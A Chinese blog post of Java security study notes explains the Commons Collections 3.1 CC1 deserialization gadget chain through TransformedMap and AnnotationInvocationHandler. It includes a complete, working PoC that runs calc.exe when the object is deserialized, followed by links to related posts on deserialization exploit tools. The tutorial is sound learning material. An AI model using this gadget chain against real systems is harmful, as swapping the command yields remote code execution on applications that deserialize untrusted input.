Java安全学习笔记--反序列化漏洞利用链CC1链(2)

已于 2022-01-18 18:50:51 修改
阅读量587 收藏 1
点赞数
分类专栏: Java安全 文章标签: java 安全 信息安全 网络安全 web安全
于 2022-01-17 18:52:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122545618
版权

测试环境

jdk1.7(jdk7u80)

Commons Collections3.1

TransformedMap

transfomedMap利用相对没那么繁琐,首先找到transformedMap类中调用transform()方法的地方,总共有三处,poc中利用的是这一处

protected Object checkSetValue(Object value) {
    return this.valueTransformer.transform(value);
}

结合AnotationinvocationHandler的readobject()方法来看,这里的var5是可控的可以通过反射的方式将transfomedMap赋值给this.memberValues,之后获取transformedMap的迭代器(iterator()),TransformedMap没有过重写这个方法,这时实际是获取的它的父类transformedMap的迭代器

setValue调用的是transformedMap的父类中的setValue方法,父类中的setValue会调用checkSetValue触发核心利用链。

public Object setValue(Object value) {
    value = this.parent.checkSetValue(value);
    return super.entry.setValue(value);
}

父类中的this.parent是怎么变成transformedMap的?

Readobject():

Iterator var4 = this.memberValues.entrySet().iterator();

transformedMap会调用父类的entrySet()把自己传入赋值给this.parent:

编写POC

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class transformedPoc {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
        Transformer[] transforms = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
        };
        Transformer chainTransformer = new ChainedTransformer(transforms);
        Map map = new HashMap();
        map.put("value", "suibian");
        //map中的key值必须为value是为了符合readObject中的if(var7!=null)的条件
        Map transformedMap = TransformedMap.decorate(map, null, chainTransformer);
        Class classInstance = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = classInstance.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler annotationInvocationHandler = (InvocationHandler) constructor.newInstance(Target.class, transformedMap);
        //序列化
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
        outputStream.writeObject(annotationInvocationHandler);
        //反序列化
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream inputStream = new ObjectInputStream(byteArrayInputStream);
        inputStream.readObject();
    }
}

Poc中的map为什么要添加一对键值对值为{“value”,”suibian”}?

Key值必须为value因为readObject中要符合if(var7!=null)这个条件才能运行到var5.setValue这行代码,通过调试var3为Target中的方法,Target中只有一个方法value(),var6获取的是map的key值“value”,这样Class var7=(Class)var3.get(var6),var7就不为空且符合下一个if的判断。

m0v0
关注
专栏目录
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
Java 反序列化漏洞
qq_61553520的博客
05-24 5399
在各种编程语言的反序列化漏洞中,Java是最引人瞩目的,因为Java的开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1229
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
白帽子凯哥聊黑客
12-23 7470
首先,我们定义一个简单的Java类,该类具有可序列化的属性。// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法 public String getUsername() {} }// 标准的getter和setter方法。
java反序列化漏洞分析
weixin_47623655的博客
03-30 2424
Java反序列化漏洞Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。Java反序列化漏洞是由于Java序列化机制本身的缺陷导致的。为了防止恶意序列化数据被反序列化,可以在程序中对未知的序列化数据进行拒绝,或者对序列化数据进行白名单或黑名单的过滤。Java反序列化漏洞的攻击方式主要有两种:基于本地文件的反序列化攻击和基于网络的反序列化攻击。
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 1013
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Java安全学习笔记--反序列化利用CC1(1)
m0_64685672的博客
01-16 1081
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 反射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
6-java安全——java反序列化漏洞利用
网络安全
07-01 4244
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
7-java安全——java反序列化CC1分析
网络安全
07-04 3746
apache commons-collections组件反序列化漏洞的反射也称为CC,自从apache commons-collections组件爆出java第一个反序列化漏洞后,就像打开了新世界大门一样,之后很多java中间件也相继爆出反序列化漏洞。例如比较常用的反序列化漏洞利用工具ysoserial就使用了LazyMap类的利用,本文将继续学习LazyMap类的利用。 ...
15.1 ByteArrayInputStream(字节数组输入流)和ByteArrayOutputStream类(字节数组输出流)
KiGang的博客
11-13 3274
字节数组流对象字节数组流对象分为输入流和输出流。分别是:ByteArrayInputStreamByteArrayOutputStream。ByteArrayInputStream类字节数组输入流在内存创建一个字节数组缓冲区,从输入流读取的数据保存在该字节数组缓冲区中。创建字节数组输入流对象有以下方式://方法 1 ByteArrayInputStream bArray = new ByteArr
java代码审计之CC1(一)
st3pby的博客
02-20 3884
InvokerTransformerCC1漏洞点位于InvokerTransformer.class中反射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
Java反序列化漏洞-ROME利用分析
l11III1111的博客
12-04 3478
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
Java反序列化漏洞实现
weixin_34393428的博客
10-22 304
一、说明 以前去面试被问反序列化的原理只是笼统地答在参数中注入一些代码当其反序列化时被执行,其实“一些代码”是什么代码“反序列化”时为什么就会被执行并不懂;反来在运营商做乙方经常会因为java反序列化漏洞要升级commons.collections或给中间件打补丁,前面说的两个问题还是不懂;今天又研究了番,也还不是很懂只是能弹计算器暂且先记一下。   二、序列化和反序列化 序列化和反序列化应该是...
Java安全学习笔记--反序列化漏洞利用CC2
m0_64685672的博客
01-18 1111
测试环境 jdk1.8(jdk8u71) apache common cellection 4.0 预备知识简述 Javassist动态字节码编程 字节码技术可以动态改变某个类的结构(添加/删除/修改新的属性/方法) 关于字节码的框架有javassist,asm,bcel等,javassist相对简单不需要掌握字节码指令相关知识即可使用。 几个关键的类: ClassPool:ClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,是CtClass对象集合的容器。一旦C..
java反序列化漏洞利用工具_Java 反序列化漏洞
weixin_39588432的博客
12-02 695
序列化和反序列化序列化:将对象转换成字节序列存储(文件、内存、数据库),对应 Java 原生序列化的 writeObject反序列化:将字节序列转换成对象,对应 Java 原生序列化的 readObject序列化作用不同系统、进程间的数据传输(RPC、HTTP )Java RMI、Java Bean保存信息,便于 JVM 启动时直接使用序列化条件该类必须实现 java.io.Serializabl...
CVE-2017-12149 Jboss反序列化漏洞利用工具
2. 反序列化漏洞概念 反序列化漏洞是指当一个应用程序接受用户控制的数据,将这些数据从一种格式转换为程序中的对象时,如果这个过程没有被正确地安全处理,就可能导致安全漏洞的产生。攻击者可以利用这样的漏洞执行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值